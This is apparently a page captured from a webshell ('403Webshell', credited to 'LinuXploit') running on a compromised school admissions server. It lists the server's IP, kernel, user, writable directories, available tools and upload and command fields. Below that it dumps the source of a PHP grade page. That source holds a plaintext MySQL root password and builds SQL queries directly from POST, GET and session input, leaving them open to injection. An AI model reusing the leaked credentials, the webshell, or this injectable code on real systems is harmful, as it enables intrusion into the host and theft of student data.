403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/admissions3/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/admissions3/gpasi.php
<?
	session_start();
	if($_SESSION['idt'] == "")
	{
		echo "Please Login!";
		exit();
	}

	if($_SESSION['Status'] != "USER")
	{
		echo "This page for Admin only!";
		exit();
	}	
	
	mysql_connect("localhost","root","klw3322");
	mysql_select_db("klw");
	mysql_query("SET character_set_results=tis620");//ตั้งค่าการดึงข้อมูลออกมาให้เป็น tis620
	mysql_query("SET character_set_client=tis620");//ตั้งค่าการส่งข้อมุลลงฐานข้อมูลออกมาให้ เป็น tis620
	mysql_query("SET character_set_connection=tis620");//ตั้งค่าการติดต่อฐานข้อมูลให้เป็น tis6
	
	$strSQL = "SELECT * FROM teacher WHERE idt = '".$_SESSION['idt']."' ";
	$objQuery = mysql_query($strSQL);
	$objResult = mysql_fetch_array($objQuery);

	$regisroom =$objResult["regisroom"];

	
?>
<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=tis-620">

<title>ฝ่ายบริหารงานวิชาการ</title>

</head>

<body>
<?
$objConnect = mysql_connect("localhost","root","klw3322") or die("Error Connect to Database");
$objDB = mysql_select_db("jorjae_jorjaedb");
mysql_query("SET character_set_results=tis620");//ตั้งค่าการดึงข้อมูลออกมาให้เป็น tis620
mysql_query("SET character_set_client=tis620");//ตั้งค่าการส่งข้อมุลลงฐานข้อมูลออกมาให้ เป็น tis620
mysql_query("SET character_set_connection=tis620");//ตั้งค่าการติดต่อฐานข้อมูลให้เป็น tis




//*** Update Condition ***//
if($_GET["Action"] == "Save")
{
	for($i=1;$i<=$_POST["hdnLine"];$i++)
	{
		$strSQL = "UPDATE member SET ";
		$strSQL .="idtest = '".$_POST["txtscor1$i"]."' ";
		$strSQL .="WHERE id = '".$_POST["hdnid$i"]."' ";
		$objQuery = mysql_query($strSQL);
	}
	//header("location:$_SERVER[PHP_SELF]");
	//exit();
}

$strSQL = "SELECT * FROM member where idstudent='$regisroom' group by room order by room+1 asc ";
$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");
$i = 1;

?>
<table width="773" border="0" align="center" cellpadding="0" cellspacing="0">
                <tr> 
                  <td width="198"><a href="homeadmin.php"><font color="#FF0000" size="2">หน้าหลัก</font></a>
				  <a href="../teacher/excel.php"><font color="#FF0000" size="2">Excel</font></a>
				  
				  </td>
                  <td width="575"><table width="100%" border="0" cellspacing="1" cellpadding="1">
                    </table></td>
                </tr>
              </table>
<form name="frmMain" method="post" action="idtest.php?Action=Save">
<table  width="100%" border="0" bgcolor="#999999">
  <tr bgcolor="#FFFFFF">
    <th width="10"> <div align="center"></div></th>
	 <th width="10"> <div align="center">#</div></th>
    <th width="200"> <div align="center">ห้อง</div></th>
	 <th width="200"> <div align="center">คณิต</div></th>
    <th width="200"> <div align="center">วิทย์</div></th>
	 <th width="200"> <div align="center">gpa</div></th>
	 <th width="200"> <div align="center">สรุป</div></th>
  </tr>
<?
$i =0;
while($objResult = mysql_fetch_array($objQuery))
{
	$i = $i + 1;
	$idstudent = $objResult['idstudent'];
	$room = $objResult['room'];
?>
  <tr bgcolor="#FFFFFF"">
    <td width="10"><div align="center">


	<?
	$crsql="SELECT count(idstudent) FROM member where scor1>0 and room='$room' and idstudent='$idstudent' ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$score1=$dcrd[0];





	$crsql="SELECT count(idstudent) FROM member where scor2>0 and room='$room' and idstudent='$idstudent'";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$score2=$dcrd[0];


	$crsql="SELECT count(idstudent) FROM member where scor3>0 and room='$room' and idstudent='$idstudent'";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$score3=$dcrd[0];
 
?>
	<input type="hidden" name="hdnid<?=$i;?>" size="5" value="<?=$objResult["id"];?>">
	 <td><?=$i?></td>
	
	</div></td>
    <td width="10"><a href="p.php?id=<? echo "$idstudent"; ?>&idr=<? echo "$room"; ?>"><?=$objResult["room"];?></a></td>
	<td width="10"><a href="scor1mat.php?id=<? echo "$idstudent"; ?>&idr=<? echo "$room"; ?>">1</a>
	<? if($score1>0)
 {
  echo "ok";
 }
 else
 {
   echo "";
 }
?>
	
	
	
	</td>
    <td width="10"><a href="scor1sci.php?id=<? echo "$idstudent"; ?>&idr=<? echo "$room"; ?>">2</a>
	<? if($score2>0)
 {
  echo "ok";
 }
 else
 {
   echo "";
 }
?>
	</td>
	<td><a href="gpatotal.php?id=<? echo "$idstudent"; ?>&idr=<? echo "$room"; ?>">3</a>
	<? if($score3>0)
 {
  echo "ok";
 }
 else
 {
   echo "";
 }
?></td>
	<td><a href="reportgpa.php?id=<? echo "$idstudent"; ?>&idr=<? echo "$room"; ?>">4</a></td>
	

	 
	 
	 
<?
	  $i+1;
  }
  ?>
</table>
<?
mysql_close($objConnect);
?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit